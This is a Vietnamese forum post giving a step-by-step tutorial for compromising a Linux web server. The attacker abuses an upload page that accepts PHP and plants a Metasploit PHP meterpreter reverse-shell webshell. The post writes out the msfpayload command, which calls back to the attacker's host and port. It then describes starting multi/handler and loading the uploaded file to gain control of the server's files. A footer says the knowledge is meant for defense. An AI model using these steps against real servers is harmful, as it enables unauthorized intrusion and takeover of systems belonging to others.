Rooting Linux server sử dụng PHP meterpreter webshell

DDos

VIP Members
22/10/2013
524
2.191 bài viết
Rooting Linux server sử dụng PHP meterpreter webshell
Giả sử bạn tìm thấy một trang upload trên một site (cho phép upload php) trên một Linux Server. Đầu tiên, bạn cần tạo ra một php payload, upload nó lên server, thực hiện nó để nhận được một meterpreter session. Bây giờ, với meterpreter session này, bạn có thể upload bất kỳ thứ gì bạn muốn, thực hiện việc root server.

Bước 1: Tạo payload sử dụng metasploit
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 R>ddos.php

1490892996Screenshot from 2014-02-07 14:02:07.png

Sau đó, bạn sẽ nhận được file ddos.php

1490892996Screenshot from 2014-02-07 14:02:18.png

Bước 2: Upload file này lên webserver.

1490892996Screenshot from 2014-02-07 14:07:09.png


1490892996Screenshot from 2014-02-07 14:07:32.png

Bước 3: Sử dụng module multi/handler để thiết lập việc khai thác

1490892996Screenshot from 2014-02-07 15:03:46.png

Bước 4: Bây giờ, bạn cần thực hiện upload payload trên server, đi tới thanh địa chỉ và nhập đường dẫn tới file vừa upload. Bạn sẽ nhận được một meterpreter từ webserver tới máy của bạn.

1490892996Screenshot from 2014-02-07 14:09:31.png

Bạn có thể chỉnh sửa, xóa, upload file tùy ý trên webserver.
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Bên trên